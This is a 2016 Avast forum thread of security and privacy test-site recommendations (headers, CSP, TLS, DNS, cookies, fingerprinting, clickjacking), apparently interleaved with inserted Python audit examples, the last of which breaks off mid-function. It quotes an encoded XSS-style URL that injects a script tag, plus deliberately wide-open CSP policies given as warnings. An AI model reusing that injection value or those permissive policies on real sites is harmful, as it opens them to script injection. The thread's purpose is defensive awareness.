(http://screencast-o-matic.com/screenshots/u/Lh/1458954806198-47246.png)
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2016, 12:39:51 AM
Hi bob3160,

Thanks for checking for us  ;)

Another test: http://mobify.site/results/http%3A%2F%2Fsandbox.onlinephpfunctions.com%2F
An example from a scan to test whether a website is fit for Mobile or should be adopted.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2016, 05:29:11 PM
Check whether your email address or username have been compromised: https://haveibeenpwned.com/
Should you change your password? Read here: http://www.forbes.com/sites/adamtanner/2014/04/14/these-sites-tell-which-of-your-accounts-have-been-hacked/#25385bbd4e8e
But this checking site itself does not seem secure (PHISHING): htxps://shouldichangemypassword.com/   known cloudfront abuse!
It just comes with a meagre T-Status...
while this seems the proper check site for that: https://breachalarm.com/

And again polonus wants to remark: "What is security on the Interwebs, according to us here that educate towards a better and more secure website security standards, like Pondus, Steven Winderlich, Eddy and several others - we can only say security is relative. Look here: https://securityheaders.io/?q=breachalarm.com  scores a very meagre R-Status and following the redirect to the https page there we will get a D-Status: https://securityheaders.io/?q=https%3A%2F%2Fbreachalarm.com%2F  This all for what that is worth.
And here we do not reach any further than an F-Status: https://sritest.io/#report/b71813c2-9458-4bde-8c40-b564a60de8cf

So whatever you do on the Interwebs be fully aware of the fact that generally speaking it is a rather insecure place with software that often has not been implemented/updated and patched right and has been weakened and holed on purpose to suit those parties best that wanna earn from your clicks or store your metadata for general surveillance purposes, not speaking of all the cybercriminals with bad intentions.

To come to a slightly more secure Internet a lot of work still needs to be done and a lot of education towards such goals may be necessary. Good if this posting served this goal to make you all a little bit more aware of the actual (in)security status of where you surf. Be on top of it feeling secure and not in the role of a serf. Keep your visors up and go with Avast's protection.

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: Secondmineboy on April 25, 2016, 05:41:10 PM
Check whether your email address or username have been compromised: https://haveibeenpwned.com/
Should you change your password? Read here: http://www.forbes.com/sites/adamtanner/2014/04/14/these-sites-tell-which-of-your-accounts-have-been-hacked/#25385bbd4e8e

polonus

Have my GMail account breached by the Avast Forum hack and Malwarebytes hack Forum, even tho on the latter one i didnt even know i have an account there at all.
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2016, 06:27:21 PM
This is sort of proof  that what we claim here about insecure or potentially insecure websites is true: http://www.theregister.co.uk/2016/04/19/google_80000_sites_breached/

Often it is that website software is not secured in a proper way or the cocktail of security measures and securing code is hampering overall security or rather will lead to less security if a cocktail of the wrong layered security measures has been implemented. There are a lot of webmasters/webadmins that still are not aware how to properly condition website security - (user enumeration enabled, directory listing enabled, no security headers implemented, https security not properly implemented, outdated or even left (inline) javascript code installed, iFrame insecurity, sql/xss insecurity, servers speaking out too loud, BEAST, POODLE, DROWN, SHA1 vulnerability, PHP exploits etc. etc.

When are we going to properly train these people that should keep their visitors secure, and/or demand they have been properly trained and then we also have to go against those parties that profit from the general overall insecurity and therefore will not complain nor wanna change that existing situation soon.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2016, 02:40:23 PM
Interesting link on "bad ISPs": https://wiki.vuze.com/w/Bad_ISPs
So ISPs that seem to frustrate various P2P-ing users.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2016, 04:39:44 PM
MS is going to alert against the weak SHA-1 cryptographic algorithm in IE and Edge: https://blogs.windows.com/msedgedev/2016/04/29/sha1-deprecation-roadmap/
Check on sha-1: https://shaaaaaaaaaaaaa.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 04, 2016, 10:34:00 PM
Folks, two DNS tests, Wildcard domains DNSSEC resolver test, to test whether you can connect to all websites: http://0skar.cz/dns/en/
and a check whether your ISP resolves all the domain names you request, so they know all you do on the Interwebs: https://www.dnsleaktest.com/
click on extended test and wait for the results. Whenever you find your ISP DNS in that list it means you are in their dragnet.  ::)

polonus
Title: Re: Tests and other Media topics
Post by: mchain on June 06, 2016, 09:35:24 PM
Folks, two DNS tests, Wildcard domains DNSSEC resolver test, to test whether you can connect to all websites: http://0skar.cz/dns/en/
and a check whether your ISP resolves all the domain names you request, so they know all you do on the Interwebs: https://www.dnsleaktest.com/
click on extended test and wait for the results. Whenever you find your ISP DNS in that list it means you are in their dragnet.  ::)

polonus
I would think attached below would show such dragnet behavior:
Title: Re: Tests and other Media topics
Post by: polonus on July 08, 2016, 07:17:31 PM
Found some issues here: https://forum.avast.com/index.php?topic=188252.0
and then thought to myself how this could work out for the client (e.g. in the browser)
and stumbled upon this test site: https://tlsfun.de/  source: Hanno Böck
like this one for example: https://sslelement.hboeck.de/
and various other test scans.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 23, 2016, 04:00:52 PM
All browser extensions that exist are not capable of masking the uniqueness of your identifiable browser, not even via a webproxy of sort.
Going under in the herd is your best option. Good Adobe Flash will be left, because it uniquely identifies your browser and your native client, Widevine content description module and Widevine adapter, Time Zone, User Agent are known.
Your browser has a unique fingerprint and that could be linked to your browsing.
JS-accessible browser objects like navigation and screen make your browser detectable in every detail.

Test here: https://panopticlick.eff.org  and then here for canvas fingerprint: https://www.browserleaks.com/canvas
When I have javascript disabled, e.g. via a webproxy I get:
JavaScript Disabled — Canvas element is part of HTML5 and is accessible via JavaScript API
Canvas Support in Your Browser
Canvas (basic support)   ?
Text API for Canvas   ?
Canvas toDataURL   ?
Database Summary
Unique User-Agents   109000
Unique Fingerprints   4875
Your Fingerprint
Signature   N/A
Found in DB   N/A

But then probably the webproxy logs have these details.

Now folks let us generate our own online UUID (universally unique identifier)  with this generator: https://www.uuidgenerator.net/
and https://www.guidgenerator.com/online-guid-generator.aspx

What is a Version 1 UUID?
A Version 1 UUID is a universally unique identifier that is generated using a timestamp and the MAC address of the computer on which it was generated.

Also use: https://www.uuidgenerator.net/version4

What is a version 4 UUID?
A Version 4 UUID is a universally unique identifier that is generated using random numbers. The Version 4 UUIDs produced by this site were generated using a secure random number generator.

0186afb4-e911-47de-89da-ea0c4e0a72ee
a48c5abb-b750-4591-a9d6-40dab0338aa4
34a94f63-5653-409a-bf22-0fb758f2c794

enjoy,

polonus

P.S. Do go down in the noise produced by this extension to mask your canvas fingerprinting,
 use Canvas Defender extension for firefox and chrome:
https://chrome.google.com/webstore/detail/canvas-defender/obdbgnebcljmgkoljcdddaopadkifnpm/related

D
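The Version 1 versus Version 4 difference described above, as an added example that is not part of the post: it recovers the timestamp and node (MAC address) that a Version 1 UUID is built from, flags whether that node is a genuine hardware address, and shows that a Version 4 value (one of the three quoted above) carries nothing of the kind. The sample node value is constructed.

```python
import datetime
import uuid

# Number of 100-nanosecond ticks between the UUID epoch (1582-10-15) and the Unix epoch.
UUID_EPOCH_OFFSET_100NS = 0x01B21DD213814000


def sample_v1(node: int, clock_seq: int) -> str:
    """Generate a Version 1 UUID with a chosen (constructed) node, for demonstration."""
    return str(uuid.uuid1(node=node, clock_seq=clock_seq))


def v1_fields(value: str) -> dict:
    """Recover the fields a Version 1 UUID is built from.

    Returns the creation time (UTC), the 48-bit node formatted as a MAC address,
    the clock sequence, and whether the node looks like a real hardware address.
    Raises ValueError for any other version, which has no such structure.
    """
    u = uuid.UUID(value)
    if u.version != 1:
        raise ValueError(f"version {u.version} UUID carries no timestamp or MAC")
    # u.time is the 60-bit count of 100 ns ticks since the UUID epoch.
    unix_seconds = (u.time - UUID_EPOCH_OFFSET_100NS) / 10_000_000
    created = datetime.datetime.fromtimestamp(unix_seconds, tz=datetime.timezone.utc)
    node_bytes = u.node.to_bytes(6, "big")
    mac = ":".join(f"{b:02x}" for b in node_bytes)
    # RFC 4122: a generator without a hardware address sets the multicast bit
    # (least significant bit of the first octet), so an even first octet
    # indicates a genuine MAC that ties the identifier to one machine.
    return {
        "created": created,
        "mac": mac,
        "clock_seq": u.clock_seq,
        "real_mac": (node_bytes[0] & 0x01) == 0,
    }


def exposes_host(value: str) -> bool:
    """True when the identifier leaks a hardware address; Version 4 UUIDs never do."""
    try:
        return v1_fields(value)["real_mac"]
    except ValueError:
        return False


if __name__ == "__main__":
    demo = sample_v1(node=0x001122334455, clock_seq=0x0123)
    print(demo, v1_fields(demo))
    print("0186afb4-e911-47de-89da-ea0c4e0a72ee exposes host:",
          exposes_host("0186afb4-e911-47de-89da-ea0c4e0a72ee"))
```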
Title: Re: Tests and other Media topics
Post by: polonus on August 23, 2016, 10:42:15 PM
Misconfiguration and mistakes in configuring and managing DNSSEC servers may help exploitation via DNS reflection attacks, responding to a feature DNS "ANY" query providing all sort of info on the domain.

Such poorly configured DNSSEC servers could amplify attacker's traffic by 28.9 times.

"ANY" requests should be filtered out and an abuse-detection mechanism put in place. Source: Richard Chirgwin on The Register.

Hence we test: http://dnssec-debugger.verisignlabs.com/server78.bertina.us
and re-test: http://dnsviz.net/d/

Re example: http://dnsviz.net/d/server78.bertina.us/dnssec/
error: bertina.us zone: The server(s) were not responsive to queries over TCP. (185.88.153.173)

enjoy,

polonus (volunteer website security analyst and website error-hunter)

P.S. Nice system to check: https://bintray.com/rafaeljusto/deb/shelter
Online check semver: http://jubianchi.github.io/semver-check/
Given the version you entered:

The next major release will be 2.0.0
The next minor release will be 1.1.0
The next patch release will be 1.0.1

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2016, 12:07:19 PM
Observatory Mozilla Scan: https://observatory.mozilla.org/
Example: https://observatory.mozilla.org/analyze.html?host=www.aplusoassociates.com

The crypto checks: tls.imirhil.fr and https://cryptoreport.websecurity.symantec.com/checker/
re: https://tls.imirhil.fr/smtp/www.aplusoassociates.com

For the forum: https://tls.imirhil.fr/https/forum.avast.com
No more than a meagre F-score  :o

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2016, 01:49:18 PM
But to truly discern about insecure versus secure setting,
one has to know how to configure according best practices,
and what third party choices one should make.

For instance for __cfduid cookie from Cloudflare,

not with proper settings like here:

Cookie security options (2 cookies)

Quote
Secure cookies: Warning

Requested URL: https://www.security.nl/ | Response URL: https://www.security.nl/ | Page title: Security.NL | HTTP status code: 200 (OK) | Response size: 58,066 bytes (gzip'd) | Duration: 645 ms
Overview
Cookies served over HTTPS but not flagged as "secure" may be sent over an insecure connection by the browser. Often this may be a simple request for an asset such as a bitmap file but if it's on the same domain as the cookie is valid for then it will be sent in an insecure fashion. This poses a risk of interception via a man in the middle attack.

Result
It looks like a cookie is being served over HTTPS without the "secure" flag being set (name : value):

__cfduid : d35d12748d6////////////6e3c478281472209606

Unless the cookie needs to be sent over an insecure connection, the "secure" flag should always be set to ensure it can only be sent with an HTTPS request.

Then it seems it cannot be disabled as it is a tracking cookie for CloudFlare to decide who is trusted/non-trusted.

Read: http://webmasters.stackexchange.com/questions/59226/disable-cfduid-cookie-from-cloudflare

Verdict: Host-only attribute insecure.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2016, 01:54:43 PM
For a lot of sites that should, like for instance banking sites, we often find that the content security policy (CSP) header is not being set. This makes the website vulnerable to scripting injections (often reflected XSS via swf objects).

CSSStyleSheet.insertRule() not permitted. Why? The stylesheet originates from another (sub)domain and cannot run from script (as the sandbox blocks it). CSP does not permit 'unsafe-inline' for 'style-src' (and no nonce and/or hash is set to be validated), so the whole style tag is not permitted.

CSP prevents that non-trusted sources be trusted (developer-set).

CSP also blocks marketing-pixels and tag-manager will not function properly and directly for new pixel domains
(good actually in a sys-admin position/view against aggressive marketing overlords,
so they cannot overrule good-sensed security *).

* But not all cloudhosting parties support CSP headers. Bad example here is Cloudfront.

Just some musings of mine to point out the importance of decent best policy security header implementation.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2016, 11:07:10 PM
HTTP Header check: https://hackertarget.com/http-header-check/
another way using their api: http://api.hackertarget.com/httpheaders/?q=http://www.google.com

See: https://adresults.nl/tools/header-checker/  &  https://headers.cloxy.net/
Re: http://www.internetmarketingninjas.com/header-checker/

Read: https://www.keycdn.com/blog/http-security-headers/  -> check: https://tools.keycdn.com/curl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2016, 11:44:33 PM
Here for a random example, I check observatory results against Recx Security Analyzer extension results: https://observatory.mozilla.org/analyze.html?host=frontpage.fok.nl

HTTP Security Header returned cache-control no-cache with a warning, not according best policies.
Only access-control.allow.origin OK
allowallcookies, sessid and -cfduid Host-only attribute not returned, screen cookie HTTP only attribute not returned.

Quote
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 20:53:27 GMT
Content-Type: text/html; charset=iso-8859-15
Connection: keep-alive
Set-Cookie: __cfduid=d5f6938f885ca343e19e68ad17de5c9fe1472331207; expires=Sun, 27-Aug-17 20:53:27 GMT; path=/; domain=.fok.nl; HttpOnly
Set-Cookie: token=83aec9f5940a64e2d1ad98c16e8a2234; path=/; domain=.fok.nl
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vc=1; expires=Sat, 27-Aug-2016 20:56:27 GMT; path=/; domain=.fok.nl; httponly
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 2d9269c06bb621c8-EWR

polonus
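An added example (my code, not the post's or any scanner's) that runs the checks discussed in the three posts above over the response head quoted here: it reports which cookies lack the Secure, HttpOnly and SameSite attributes, which security headers (CSP among them) are absent, and the Server banner. The set of expected headers is my assumption; the sample response is the one quoted above.

```python
from typing import Dict, List, Tuple

# Security headers whose absence the scanners above report (an assumed, minimal set).
EXPECTED_HEADERS = (
    "content-security-policy",
    "strict-transport-security",
    "x-frame-options",
    "x-content-type-options",
)

# Response head as quoted in the post above (the frontpage.fok.nl check).
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 20:53:27 GMT
Content-Type: text/html; charset=iso-8859-15
Connection: keep-alive
Set-Cookie: __cfduid=d5f6938f885ca343e19e68ad17de5c9fe1472331207; expires=Sun, 27-Aug-17 20:53:27 GMT; path=/; domain=.fok.nl; HttpOnly
Set-Cookie: token=83aec9f5940a64e2d1ad98c16e8a2234; path=/; domain=.fok.nl
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vc=1; expires=Sat, 27-Aug-2016 20:56:27 GMT; path=/; domain=.fok.nl; httponly
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 2d9269c06bb621c8-EWR
"""


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response head into its status line and (lowercased name, value) pairs.

    Repeated headers such as Set-Cookie are kept as separate entries; only the first
    colon separates name from value, so dates and cookie expiries stay intact.
    """
    status, *lines = raw.strip().splitlines()
    pairs = []
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return status.strip(), pairs


def audit_cookie(set_cookie: str) -> Dict[str, object]:
    """Report the attributes one Set-Cookie value lacks.

    Attribute names are case-insensitive, so 'HttpOnly' and 'httponly' both count.
    """
    parts = [p.strip() for p in set_cookie.split(";") if p.strip()]
    name = parts[0].partition("=")[0]
    attrs = {p.partition("=")[0].lower() for p in parts[1:]}
    issues = []
    if "secure" not in attrs:
        issues.append("missing Secure")    # browser may send it over plain HTTP
    if "httponly" not in attrs:
        issues.append("missing HttpOnly")  # readable by client-side script
    if "samesite" not in attrs:
        issues.append("missing SameSite")  # attached to cross-site requests
    return {"name": name, "issues": issues}


def audit_response(raw: str) -> Dict[str, object]:
    """Run the header and cookie checks over one raw response head."""
    _, pairs = parse_headers(raw)
    present = {name for name, _ in pairs}
    return {
        "missing_headers": [h for h in EXPECTED_HEADERS if h not in present],
        "cookies": [audit_cookie(v) for n, v in pairs if n == "set-cookie"],
        # a Server banner is the "server talking too loud" point made earlier
        "server_banner": next((v for n, v in pairs if n == "server"), None),
    }


if __name__ == "__main__":
    for key, value in audit_response(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```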
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2016, 07:38:11 PM
An intelligent scan to perform for -www.modxcloud.com tested at
Quote
Domain Name: =www.modxcloud.com
URL Tested: -https://www.modxcloud.com
Number of items downloaded on page: 92

   Valid Certificate found.
   Certificate valid through: Sep 8 22:26:55 2017 GMT
Certificate Issuer: StartCom Ltd.
SSL Protocols Supported: TLSv1 TLSv1.1 TLSv1.2
   Total number of items: 92
Number of insecure items: 1
Insecure URL: -http://fonts.googleapis.com/css?family=Oxygen:700,400
Found in: -https://cdn3.modxcloud.com/assets/components/markdowneditor/css/cards.css

   Secure calls made to other websites:
-cdn5.modxcloud.com is valid and secure.

-cdn1.modxcloud.com is valid and secure.

-cdn2.modxcloud.com is valid and secure.

-cdn3.modxcloud.com is valid and secure.

-cdn4.modxcloud.com is valid and secure.

-use.typekit.net is valid and secure.

-ajax.googleapis.com is valid and secure.

Check at https://www.whynopadlock.com/check.php

Confirmed here: -https://www.modxcloud.com
Detected libraries:
jquery - 1.7.2 : (active1) -https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Blocked by scriptblocker = -https://assets.customer.io/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2016, 08:50:28 PM
Also insecure tracking there:
100% of the trackers on this site could be protecting you from NSA snooping.
Tell modxcloud.com to fix it.

 All trackers
At least 10 third parties know you are on this webpage.

 -cdn1.modxcloud.com
 -use.typekit.net
 -Google
 -cdn5.modxcloud.com
 -cdn2.modxcloud.com
 -cdn3.modxcloud.com
 -cdn4.modxcloud.com
 -Segment.io
 -modxcloud.com
 -cdn.embedly.com
Legend
 Tracker could be tracking safely if this site was secure.
 Tracker does not support secure transmission.

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 05, 2016, 09:42:07 PM
Just went over this session hijacking description info: http://resources.infosecinstitute.com/session-hijacking-cheat-sheet/

Then stumbled upon these bug patterns list: http://resources.infosecinstitute.com/session-hijacking-cheat-sheet/

Time for a web cookies scan: https://webcookies.org/

Testing and extensions: https://www.owasp.org/index.php/Testing_for_cookies_attributes_(OTG-SESS-002)

Bookmarklet: javascript:alert('Cookies stored by this host or domain:\n\n' + document.cookie.replace(/; /g,'\n'));

Oh, but you wanted the results for this forum site, OK? -> https://webcookies.org/cookies/forum.avast.com/2999337

Server vulnerable to OpenSSL CCS attack  :o
Dubious as
Quote
SSL-encrypted websites and servers are still secure. The vulnerabilities that were discovered are in the software itself and not in the Certificate Authorities or SSL/TLS protocols. Once the patches are applied, your systems are secured against the vulnerabilities revealed by the OpenSSL Development team today.
quote info digi cert.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2016, 12:22:02 PM
OCSP stapling decreases the load on a PKI infrastructure's OCSP server by attaching a signed OCSP response to the target in a TLS connection. In addition it creates a more secure/private session since the CA doesn't know that your browser is accessing a given site. Some people have compared this behavior to Kerberos. The Chrome team has decided that they plan to remove CRL and regular OCSP checks, but they haven't disabled OCSP stapling. Other than the client side check: check website here: https://observatory.mozilla.org/analyze.html?host=

Test OCSP stapling in your browser here: http://www.vpnhosting.cz/ocsp/

Most Windows-type browsers support it. I have it therefore enabled.
Info credits go to Jaromir Kuba.

Have a nice day,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2016, 11:45:43 PM
A comma-test,

The circumvention of DNS and the hosts file by Microsoft by hard-coding some three dozen IPs in the OS, since XP SP2 and outside of industry standards, is a bad idea for quite a couple of reasons. It is ill- or undocumented. So we definitely need the Avast Firewall to mitigate this peeking nose of the camel.

With their Kerberos-like authentication validation this means they can deny any user access to their platform and services whenever MS or a restrictive government chooses to do so.

Ultimately this could lead to a development of a device platform that offers a user experience of a mix of something between a web TV and an XBox.

Alas Google does likewise. Do the comma test here: http://www.benedelman.org/hardcoding/commatool.html
and read about their hard-coded algorithms: http://www.benedelman.org/hardcoding/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 08, 2016, 12:42:17 AM
Technical reasons why hard-coding IPs is a bad idea:
IP addresses should not be hardcoded
squid : S1313
Hardcoding an IP address into source code is a bad idea for several reasons:
a recompile is required if the address changes
it forces the same address to be used in every environment (dev, sys, qa, prod)
it places the responsibility of setting the value to use in production on the shoulders of the developer
Noncompliant Code Example
String ip = "127.0.0.1";
Socket socket = new Socket(ip, 6667);
Compliant Solution
String ip = System.getProperty("myapplication.ip");
Socket socket = new Socket(ip, 6667);  info credits SonarQube.

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2016, 01:39:01 PM
In the light of all the data breaches recently and the earlier AOL privacy debacle, we show that privacy may not actually exist:
http://www.aolstalker.com see search results and sponsored listings.
An eye-opener to how little privacy you have,

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 09, 2016, 02:57:45 PM
In the light of all the data breaches recently and the earlier AOL privacy debacle, we show that privacy may not actually exist:
http://www.aolstalker.com (http://www.aolstalker.com) see search results and sponsored listings.
An eye-opener to how little privacy you have,

polonus
And how long have I been stressing that same point ???
You may think you're hiding but someone will always find you.
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2016, 11:09:07 PM
Hi bob3160,

You are right, as the use of the browser (or client, as some actually call it) is free only because it is one big tracking and ad-launching machine for big data vendors (your very private data included). So they want insight into, and to sell, all that you do online and all that you have posted online; you gave it all away when you agreed to that in order to use their free service(s). You have paid with your data.

Do not put/do something online that may one day come back to bite you. And always keep at the back of your mind what I sketched out in the previous paragraph. The Internet never forgets and you will never know who may have access to what you have posted.

Forewarned is forearmed.

your avast forum friend,

polonus

Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2016, 05:16:32 PM
To see it in perspective.
What Google knows about you:
What you think according to Google (profile): http://www.google.com/settings/ads/
Where you have been according to Google (location): https://maps.google.com/locationhistory
What you searched for: https://www.google.com/history/
All the vids on YouTube: https://www.youtube.com/feed/history/search_history
Apps and your Google data: https://security.google.com/settings/security/permissions
All your Google metadata: https://www.google.com/takeout

Hope you stay aware of what they do...

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 21, 2016, 09:49:42 PM
Very interesting and revealing.
Emphasizes the point: Hiding is futile
Title: Re: Tests and other Media topics
Post by: polonus on September 23, 2016, 11:52:15 AM
Has someone hacked in on my private Wifi Network?

To check the devices shown on your wifi connection, use the small tool from the remarkable Israeli developer Nir Sofer:
Wireless Network Watcher, then check the found MAC addresses here: http://www.coffer.com/mac_find/

Enjoy,

polonus

P.S. Read here why I posted here what I posted: https://forum.avast.com/index.php?topic=191140.msg1339902#msg1339902

Nice proggie to detect rogue DHCP servers on your network: http://www.symantec.com/connect/downloads/detect-rogue-dhcp-servers-network

Damian
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2016, 12:19:02 AM
CSP Evaluator
Google has come up with a great tool to check on CSP -
Google uses the CSP evaluator for assets including its Cloud Console, Photos, History, and Maps Timeline among others,
and will expand the list.

It resides here: https://csp-evaluator.withgoogle.com/

So I could not refrain from trying it out, as polonus is into volunteer website security on an almost daily basis.

Enjoy, my friends, enjoy!

Checking on this site: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.axiscorner.com%2F&useragent=Fetch+useragent&accept_encoding= e.g. -https://plus.google.com/u/1/b/108271385407869247047/+Axiscorner-Architecture-Rendering-Service/about” rel=”publisher

We get two high severity findings and a syntax error:
[syntax error] Directive "check" is not a known CSP directive.
[high] script-src [missing]
script-src directive is missing.
[high] object-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?

Legend

X  High severity finding
   Medium severity finding
   Possible high severity finding
   Directive/value is ignored in this version of CSP
   Possible medium severity finding
   Syntax error
   Information
   All good

Blocked by Netcraft as an XSS attack: Blocked URL: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fplus.google.com%2Fu%2F1%2Fb%2F108271385407869247047%2F%2BAxiscorner-Architecture-Rendering-Service%2Fabout%22%3EAxis+Corner+Reviews%3C%2Fa%3E+Here%21%3Cscript+type%3D%22application%2Fld%2Bjson%22%3E+%7B++%22%40context%22%3A+%22http%3A%2F%2Fschema.org%2F%22%2C++%22%40type%22%3A+%22Br

Google also released the CSP Mitigator to help administrators apply custom CSP policy to applications and to better understand the impact of enabling CSP including highlighting parts that may break. -> https://chrome.google.com/webstore/detail/csp-mitigator/gijlobangojajlbodabkpjpheeeokhfa

I certainly hope security researchers will benefit from this addition to their toolchest,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2016, 05:58:55 PM
And of course this cannot be established by just one scan.
Read: https://content-security-policy.com/
Also test whether your browser can handle it: https://content-security-policy.com/browser-test/

The observatory project scan may also help you: https://observatory.mozilla.org/

And then we see that even security scan sites may not be quite secure in these respects, example here:
https://observatory.mozilla.org/analyze.html?host=www.scumware.org

Already presented this, also handy in this respect:  http://cyh.herokuapp.com/cyh

Also nice to have this extension to check a site: https://chrome.google.com/webstore/detail/recx-security-analyser/ljafjhbjenhgcgnikniijchkngljgjda

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 01, 2016, 01:31:30 PM
Generate your Content Security Policy header with this online generator.
Do it here: http://cspisawesome.com/

And another one for domain: https://report-uri.io/home/generate

polonus

P.S. If you would create a CSP like this
Quote
content="default-src * 'unsafe-inline' 'unsafe-eval'"
,
that would make your website really very insecure. I trust you would not define a thing like that,
as an attacker would have an easy job injecting malcode into your site. (info credits go to StackOverflow's Schlaus)
and this would be even worse, allowing everything everywhere:
Quote
default-src *; style-src * 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: 'unsafe-inline'; connect-src * 'unsafe-inline'; frame-src *;
(info credits go to StackOverflow's Amold Roa).

Damian (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2016, 05:34:17 PM
Websites are capable of tracking you online even after you have cleansed your browser.

Research: two unpatched flaws that can be exploited to track millions of Internet users, allowing malicious website owners:
List Building: to compile a list of domains visited by users, even if they have cleared their browsing history
Tracking Cookies: to tag users with a tracking cookie that will persist even after they have deleted all cookies
These two browser fingerprinting techniques abuse HTTP Strict Transport Security (HSTS) and Content Security Policy, new security features already built into Mozilla Firefox and Google Chrome and expected to make their way to other mainstream browsers in the near future.
(info credits: The Hacker News)  Read example: https://github.com/MicrosoftEdge/static-code-scan/issues/100

Check for yourself: https://zyan.scripts.mit.edu/sniffly/

Polonus found out that the HTTPS Everywhere extension and uMatrix can interfere with Sniffly, but not fully protect against such threats.

Compare scanning here: https://panopticlick.eff.org/

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2016, 11:40:00 PM
Above we presented CSP, but remember CSP is a security overlay. We should always also depend on other mechanisms, like employing frameworks with strict contextual escaping for generating markup, using the X-Frame-Options header to protect against clickjacking, and ensuring that resources on secure pages are fetched over HTTPS.

As mentioned, one of the three CSP vulnerabilities is clickjacking. Let us check for clickjacking vulnerability here: https://www.lookout.net/test/clickjack.html  and here: http://online.attacker-site.com/html5/ClickjackingTester/

Server requests can become blocked by an extension.  Mind that many Chinese ASP websites have clickjacking warnings.
Check also with: https://asafaweb.com/

A warning gives:
Quote
Overview
Websites are at risk of a clickjacking attack when they allow content to be embedded within a frame. An attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An "X-Frame-Options" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.

Result
It doesn't look like an X-Frame-Options header was returned from the server which means that this website could be at risk of a clickjacking attack. Add a header to explicitly describe the acceptable framing practices (if any) for this site.

polonus
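The CSP Evaluator findings (missing script-src, missing object-src, an unknown directive), the two wide-open policies quoted on October 01 and the X-Frame-Options warning from asafaweb quoted above all come down to reading two response headers. Here is an added example, not code from any of the posts, Google's CSP Evaluator or asafaweb, that reproduces those checks offline: it parses a Content-Security-Policy value the way browsers do (first occurrence of a directive wins, script-src and object-src fall back to default-src, frame-ancestors does not) and decides whether a response is frameable from CSP frame-ancestors and X-Frame-Options together. The directive list, the sample policies and the sample headers are constructed assumptions.

```python
"""Audit a Content-Security-Policy and a response's framing protection.

Added example; not code from the forum posts, Google's CSP Evaluator or asafaweb.
The policies and headers at the bottom are constructed for illustration.
"""

# Directives browsers recognise (assumption: CSP Level 2/3 directive names).
KNOWN_DIRECTIVES = {
    "default-src", "script-src", "script-src-elem", "script-src-attr", "style-src",
    "style-src-elem", "style-src-attr", "img-src", "font-src", "connect-src",
    "media-src", "object-src", "frame-src", "child-src", "worker-src",
    "manifest-src", "prefetch-src", "base-uri", "form-action", "frame-ancestors",
    "sandbox", "report-uri", "report-to", "upgrade-insecure-requests",
    "block-all-mixed-content", "plugin-types", "require-trusted-types-for",
    "trusted-types", "navigate-to",
}
# Sources that make a script-src effectively open.
BROAD_SOURCES = {"*", "http:", "https:", "data:", "blob:", "filesystem:"}
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(policy: str) -> dict:
    """Return {directive: [source, ...]}. Names are lower-cased; a repeated
    directive is ignored, as browsers do (first occurrence wins)."""
    directives = {}
    for chunk in policy.split(";"):
        tokens = chunk.strip().split()
        if not tokens:
            continue
        directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def audit_csp(policy: str) -> list:
    """Return findings in the spirit of the CSP Evaluator output quoted above."""
    d = parse_csp(policy)
    findings = []
    for name in d:
        if name not in KNOWN_DIRECTIVES:
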